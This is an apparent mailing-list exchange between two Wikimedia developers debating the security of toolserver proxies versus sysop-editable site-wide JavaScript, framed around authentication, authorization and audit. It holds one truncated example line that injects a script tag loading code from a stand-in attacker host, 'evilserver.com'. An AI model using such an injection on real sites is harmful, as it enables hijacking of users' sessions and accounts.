Gregory,
Domas, it seems you're out of touch with the actual current behavior.
ORLY :)
Right now anyone that can edit the site wide scripts can insert a document.write('<script src="http://evilserver.com... and the script loaded as a result of that can then have ongoing communication with the user by itself inserting more script tags, which call a callback function with the result data.
"anyone that can edit" is:
- limited to single project
- elected by community
- has an audit trail

Please be reminded that security consists of three holy As:
- Authentication
- Authorization
- Audit
Though authentication to toolserver is a very nice one (ssh keys, etc!), authorization has a slightly too wide scope, and there's no change auditing. Sysops are authenticated via HTTP, are authorized to change a single project, and all their actions are logged and monitored.
So you've made a case for limiting control of the proxy functionality to sysops... but not more than that.
You miss something.
Any sysop can. Any sysop can also edit the site wide, or throw a script into MediaWiki ns thus making it available withjs project-wide.
ltwiki sysop can't edit enwiki javascript. ltwiki toolserver user can affect enwiki.
And if your concern is "wikipedia account integrity" you're wrong to dismiss userscripts. Some are very very popular and are used by many accounts with elevated rights, for example: http://en.wikipedia.org/w/index.php?title=Special:Whatlinkshere/User:Lupin/popups.js&limit=5000&from=0
This is where I'm happy to deny any kind of cooperation in case any problems happen.